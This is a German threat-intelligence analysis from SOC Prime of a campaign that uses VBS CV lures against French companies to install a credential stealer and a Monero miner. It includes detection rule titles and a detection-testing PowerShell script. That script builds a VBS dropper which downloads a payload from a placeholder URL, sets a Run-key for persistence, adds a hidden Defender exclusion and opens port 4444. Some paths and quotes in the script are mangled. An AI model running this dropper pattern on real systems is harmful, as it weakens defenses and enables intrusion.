SOC Prime Bias: Mittel

26 März 2026 16:07

Analyse von FAUX#ELEVATE: Bedrohungsakteure zielen auf Frankreich mit CV-Ködern, um Krypto-Miner und Infostealer in Unternehmensumgebungen zu installieren

Author Photo
Ruslan Mikhalov Leiter der Bedrohungsforschung bei SOC Prime linkedin icon Folgen
Analyse von FAUX#ELEVATE: Bedrohungsakteure zielen auf Frankreich mit CV-Ködern, um Krypto-Miner und Infostealer in Unternehmensumgebungen zu installieren
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Zusammenfassung

Eine Cybercrime-Operation nutzt eine bösartige VBS-Lebenslaufdatei, um auf Französisch sprechende Unternehmensumgebungen abzuzielen. Der Dropper ist stark verschleiert und so konzipiert, dass er nur auf domänengebundenen Maschinen ausgeführt wird, wo er Malware zur Anmeldeinformationsdiebstahl zusammen mit einem Monero-Miner liefert. Die Kampagne nutzt vertrauenswürdige Dienste wie Dropbox und kompromittierte marokkanische WordPress-Websites, um Nutzlasten zu hosten. Gestohlene Daten werden über SMTP nach mail.ruexfiltriert, und die Malware entfernt Spuren nach der Ausführung, um die forensische Sichtbarkeit zu verringern.

Untersuchung

Forscher haben den VBS-Dropper rückentwickelt, seine Umgebungsprüfungen aufgedeckt und die vollständige, mehrstufige Infektionskette nachverfolgt, einschließlich der 7-Zip-Extraktion, eines benutzerdefinierten RATs namens RuntimeHost.exe, dem Diebstahl von Browser-Anmeldeinformationen über ChromElevator und der XMRig-Mining-Aktivität. Sie identifizierten auch unterstützende Infrastrukturen wie IP-Adressen, dynamische DNS-Einträge und gehackte WordPress-Server. Die Persistenz wurde mit Registrierungsschlüsseln für den Start verbunden und einer versteckten geplanten Aufgabe.

Minderung

Verteidiger sollten verdächtige VBS-Dateien blockieren und strenge Kontrollen bei E-Mail-Anhängen durchsetzen. Die Überwachung sollte sich auf die ungewöhnliche Ausführung von wscript.exe, PowerShell-Befehle, die Defender-Ausschlüsse hinzufügen, und Registrierungsänderungen, die EnableLUA betreffen, konzentrieren. Organisationen sollten ausgehende SMTP-Verbindungen von Nicht-Mail-Anwendungen einschränken und Verbindungen zu bekannten Dropbox- und Mining-Pool-Infrastrukturen beobachten. Jegliche identifizierten Registrierungsschlüssel oder geplante Aufgaben sollten entfernt oder unter Quarantäne gestellt werden.

Reaktion

Sicherheitsteams sollten die Erstellung der „Microsoft Media Service“ und „z_MicrosoftEdgeAutoLaunch_2EDFBF“ Registrierungsschlüssel sowie die versteckte „MicrosoftUpdateService“ geplante Aufgabe erkennen. Warnungen sollten ausgelöst werden durch wscript.exe-Prozesse, die auf Dropbox oder die dokumentierten WordPress-Domains zugreifen. Schädliche Dateien müssen unter Quarantäne gestellt, der Host isoliert und die offengelegten Browser-Anmeldeinformationen zurückgesetzt werden. Eine forensische Überprüfung sollte anschließend klären, ob Daten durch mail.ru.

"graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef process fill:#ffddaa classDef technique fill:#c0c0c0 %% Node definitions step_phishing["<b>Technik</b> – T1566.001 Phishing: Spear-Phishing-Anhang<br/><b>Beschreibung</b>: E-Mail mit bösartigem Anhang, die beim Öffnen die erste Nutzlast liefert."] class step_phishing action step_user_execute["<b>Technik</b> – T1204.002 Benutzerausführung: Bösartige Datei<br/><b>Beschreibung</b>: Das Opfer führt die angehängte VBS-Datei aus und löst den Dropper aus."] class step_user_execute action step_dropper["<b>Technik</b> – T1059.005 Visual Basic (VBScript)<br/><b>Technik</b> – T1027 Verschleierte Dateien oder Informationen<br/><b>Beschreibung</b>: Verschleiertes VBS-Skript dient als Dropper, der zusätzliche Komponenten extrahiert."] class step_dropper action step_domain_check["<b>Technik</b> – T1069.002 Berechtigungsgruppen-Erkennung: Domain<br/><b>Beschreibung</b>: Überprüft, ob der Host einer Domain beigetreten ist, um das Verhalten anzupassen."] class step_domain_check technique step_uac_bypass["<b>Technik</b> – T1548.002 Benutzerkontensteuerung umgehen<br/><b>Technik</b> – T1562.001 Verteidigungen beeinträchtigen: Sicherheitstools deaktivieren<br/><b>Technik</b> – T1564.012 Artefakte verstecken: Defender-Ausschlüsse<br/><b>Beschreibung</b>: Erhöht Privilegien, deaktiviert Verteidigungen und fügt Ausschlüsse hinzu."] class step_uac_bypass technique step_download["<b>Technik</b> – T1102 Webservice<br/><b>Technik</b> – T1102.001 Dead Drop-Resolver<br/><b>Beschreibung</b>: Ruft zusätzliche Nutzlasten von Dropbox oder Web-Standorten ab."] class step_download technique step_deploy_toolkit["<b>Tool</b> – RuntimeHost.exe, XMRig Miner, Browser-Stealer<br/><b>Beschreibung</b>: Setzt Komponenten zur Nutzung für Mining, Anmeldeinformationsdiebstahl und weitere Ausnutzung ein."] class step_deploy_toolkit tool step_cred_access["<b>Technik</b> – T1555.003 Anmeldeinformationen von Webbrowsern<br/><b>Beschreibung</b>: Extrahiert gespeicherte Browser-Passwörter und Cookies."] class step_cred_access technique step_collect_files["<b>Technik</b> – T1005 Daten vom lokalen System<br/><b>Beschreibung</b>: Sammelt Dateien vom Desktop des Benutzers für die Exfiltration."] class step_collect_files technique step_exfiltration["<b>Technik</b> – T1048.002 Exfiltration über verschlüsseltem Nicht-C2-Protokoll: SMTP<br/><b>Technik</b> – T1071.003 Webprotokolle: Mail-Protokolle<br/><b>Beschreibung</b>: Sendet gesammelte Daten über verschlüsseltes SMTP."] class step_exfiltration technique step_resource_hijack["<b>Technik</b> – T1496 Ressourcenumleitung<br/><b>Beschreibung</b>: Nutzt XMRig zum Kryptowährungs-Mining auf dem Opferhost."] class step_resource_hijack technique step_process_injection["<b>Technik</b> – T1055 Prozessinjektion<br/><b>Beschreibung</b>: Injiziert schädlichen Code in explorer.exe, um Aktivitäten zu verbergen."] class step_process_injection technique step_c2["<b>Technik</b> – T1102 Web Service (HTTPS/Dynamic DNS)<br/><b>Beschreibung</b>: Hält Befehls- und Steuerungskontrolle über verschlüsselten Webverkehr und benutzerdefinierte Ports aufrecht."] class step_c2 technique step_persistence["<b>Technik</b> – T1547.001 Registry Run Keys / Startordner<br/><b>Technik</b> – T1053 Geplante Aufgabe/Job (versteckt)<br/><b>Beschreibung</b>: Etabliert Persistenz über Run-Schlüssel und eine versteckte geplante Aufgabe."] class step_persistence technique step_cleanup["<b>Technik</b> – T1070.004 Dateilöschung<br/><b>Beschreibung</b>: Entfernt Artefakte und Protokolle, um eine Erkennung zu vermeiden."] class step_cleanup technique %% Edge connections step_phishing –>|führt zu| step_user_execute step_user_execute –>|führt zu| step_dropper step_dropper –>|führt zu| step_domain_check step_domain_check –>|führt zu| step_uac_bypass step_uac_bypass –>|führt zu| step_download step_download –>|führt zu| step_deploy_toolkit step_deploy_toolkit –>|ermöglicht| step_cred_access step_deploy_toolkit –>|ermöglicht| step_collect_files step_cred_access –>|kombiniert mit| step_collect_files step_cred_access –>|unterstützt| step_exfiltration step_collect_files –>|unterstützt| step_exfiltration step_deploy_toolkit –>|ermöglicht| step_resource_hijack step_deploy_toolkit –>|ermöglicht| step_process_injection step_process_injection –>|bietet| step_c2 step_c2 –>|genutzt von| step_exfiltration step_deploy_toolkit –>|etabliert| step_persistence step_persistence –>|gefolgt von| step_cleanup step_exfiltration –>|gefolgt von| step_cleanup "

Angriffsablauf

Erkennungen

Möglicher IP-Abfrage-Domain-Kommunikationsversuch (via dns)

SOC Prime-Team
26. März 2026

Deaktivieren der Echtzeitüberwachung von Windows Defender und andere Einstellungen ändern (via cmdline)

SOC Prime-Team
26. März 2026

Verdächtige Ausführung aus dem öffentlichen Benutzerprofil (via process_creation)

SOC Prime-Team
25. März 2026

Mögliche Verteidigungsumgehung durch Extraktion eines verschlüsselten Archivs mit 7-Zip (via cmdline)

SOC Prime-Team
25. März 2026

LOLBAS WScript / CScript (via process_creation)

SOC Prime-Team
25. März 2026

Verdächtige Änderung der Defender-Ausschlüsse (via cmdline)

SOC Prime-Team
26. März 2026

Verdächtige Änderungen der Windows Defender-Einstellungen (via PowerShell)

SOC Prime-Team
25. März 2026

Mögliche Persistenzpunkte [ASEPs – Software/NTUSER Hive] (via registry_event)

SOC Prime-Team
26. März 2026

Verdächtige geplante Aufgabe (via audit)

SOC Prime-Team
25. März 2026

Kurzer Dateiname (via cmdline)

SOC Prime-Team
25. März 2026

Möglicher UAC-Umgehungsversuch – UAC-Deaktivierungsversuch (via registry_event)

SOC Prime-Team
25. März 2026

Verdächtige Dateien im öffentlichen Benutzerprofil (via file_event)

SOC Prime-Team
26. März 2026

IOCs (HashSha256) um zu erkennen: Analyse von FAUX#ELEVATE: Bedrohungsakteure zielen mit CV-Ködern auf Frankreich, um Crypto-Miner und Infostealer gegen Unternehmensumgebungen einzusetzen

SOC Prime AI-Regeln
26. März 2026

IOCs (SourceIP) um zu erkennen: Analyse von FAUX#ELEVATE: Bedrohungsakteure zielen mit CV-Ködern auf Frankreich, um Crypto-Miner und Infostealer gegen Unternehmensumgebungen einzusetzen

SOC Prime AI-Regeln
26. März 2026

IOCs (Emails) um zu erkennen: Analyse von FAUX#ELEVATE: Bedrohungsakteure zielen mit CV-Ködern auf Frankreich, um Crypto-Miner und Infostealer gegen Unternehmensumgebungen einzusetzen

SOC Prime AI-Regeln
26. März 2026

IOCs (DestinationIP) um zu erkennen: Analyse von FAUX#ELEVATE: Bedrohungsakteure zielen mit CV-Ködern auf Frankreich, um Crypto-Miner und Infostealer gegen Unternehmensumgebungen einzusetzen

SOC Prime AI-Regeln
26. März 2026

FAUX Elevate Anmeldeinformationen und Kryptowährungs-Mining-Erkennung [Windows-Netzwerkverbindung]

SOC Prime AI-Regeln
25. März 2026

Erkennung der SMTP- und C2-Domain-Kommunikation [Windows-Netzwerkverbindung]

SOC Prime AI-Regeln
26. März 2026

Erkennung der FAUX#ELEVATE-Kampagne Persistenz und Anmeldeinformationsdiebstahl [Windows-Prozesserstellung]

SOC Prime AI-Regeln
25. März 2026

Erkennung von bösartigem VBS-Dropper und Firewall-Modifikationen [Windows-Prozesserstellung]

SOC Prime AI-Regeln
26. März 2026

Simulation Execution

Voraussetzung: Der Telemetrie- & Basislinien-Vorab-Check muss bestanden sein.

Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der gegnerischen Technik (TTP), die entwickelt wurde, um die Erkennungsregel auszulösen. Die Befehle und Erzählungen MÜSSEN die erkannten TTPs direkt widerspiegeln und darauf abzielen, genau die Telemetrie zu generieren, die von der Erkennungslogik erwartet wird.

  • Angriffsbericht & Befehle:

    1. Stufe 1 – Bösartiges VBS ablegen: Der Angreifer schreibt einen VBS-Dropper, der eine Nutzlast der zweiten Stufe herunterlädt und einen Registrierungslauf-Schlüssel für die Persistenz schreibt.
    2. Stufe 2 – VBS ausführen über wscript.exe mit PowerShell als übergeordnetem Prozess, wodurch die übergeordnete Bedingung der Erkennung erfüllt wird.
    3. Stufe 3 – Innerhalb des VBS PowerShell aufrufen, um einen Microsoft Defender-Ausschluss hinzuzufügen (T1562.001) und Netsh, um den TCP-Eingangsport 4444 (T1562.004) für C2 zu öffnen.
    4. Stufe 4 – Beweise nach Erfolg bereinigen.
  • Regressionstest-Skript: (PowerShell – eigenständig; mit Administratorrechten ausführen)

    # -----------------------------------------------------------------------
    # Schädliche VBS-Dropper-Simulation – löst Sigma-Regel aus:
    #   Bild == "*wscript.exe" UND ParentImage in ("*powershell.exe","*netsh.exe")
    # -----------------------------------------------------------------------
    
    $vbsPath = "$env:Tempmalicious_dropper.vbs"
    $payloadUrl = "http://example.com/payload.exe"   # Platzhalter-URL
    $payloadPath = "$env:Temppayload.exe"
    
    # 1. Schaffe bösartiges VBS, das:
    #    • eine Nutzlast herunterlädt
    #    • einen Run-Schlüssel für die Persistenz schreibt
    #    • PowerShell aufruft, um Defender-Ausschluss hinzuzufügen
    #    • Netsh aufruft, um eine Firewall-Regel zu öffnen
    $vbsContent = @"
    Set objXML = CreateObject("Microsoft.XMLHTTP")
    objXML.Open "GET", "$payloadUrl", False
    objXML.Send
    If objXML.Status = 200 Then
    Set objStream = CreateObject("ADODB.Stream")
    objStream.Type = 1
    objStream.Open
    objStream.Write objXML.ResponseBody
    objStream.SaveToFile "$payloadPath", 2
    End If

‚ Persistenz durch Run-Schlüssel Set objShell = CreateObject(„WScript.Shell“) objShell.RegWrite „HKCUSoftwareMicrosoftWindowsCurrentVersionRunmalicious“, „$payloadPath“

‚ Defender-Ausschluss via PowerShell (innerhalb ausgeführt) objShell.Run „powershell.exe -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '$payloadPath'„“, 0, True

‚ Öffne Firewall-Port 4444 via Netsh (innerhalb ausgeführt) objShell.Run „netsh.exe advfirewall firewall add rule name="MaliciousPort“ dir=in action=allow protocol=TCP localport=4444″, 0, True „@

Set-Content -Path $vbsPath -Value $vbsContent -Encoding ASCII

# 2. Starte das VBS mit PowerShell als übergeordnetem Prozess
Write-Host "[*] Starte bösartiges VBS über wscript.exe (übergeordnet: PowerShell)"
Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -WindowStyle Hidden -Command `"wscript.exe `"$vbsPath`"`"" -Wait

# 3. Prüfen, ob die Firewall-Regel hinzugefügt wurde (optional)
netsh advfirewall firewall show rule name=MaliciousPort

# 4. Bereinige Artefakte (Payload & VBS) - separat für den Bereinigungsabschnitt belassen
Write-Host "[+] Simulation abgeschlossen. Überprüfen Sie Warnungen im SIEM."
  • Bereinigungskommandos: (nach Überprüfung ausführen)

    # Entferne Firewall-Regel
    netsh advfirewall firewall delete rule name="MaliciousPort"
    
    # Entferne Defender-Ausschluss
    powershell.exe -Command "Remove-MpPreference -ExclusionPath '$env:Temppayload.exe'"
    
    # Lösche Persistenz-Run-Schlüssel
    reg delete "HKCUSoftwareMicrosoftWindowsCurrentVersionRunmalicious" /f
    
    # Lösche Dateien
    Remove-Item -Path "$env:Tempmalicious_dropper.vbs" -Force
    Remove-Item -Path "$env:Temppayload.exe" -Force
    
    Write-Host "[+] Bereinigung abgeschlossen."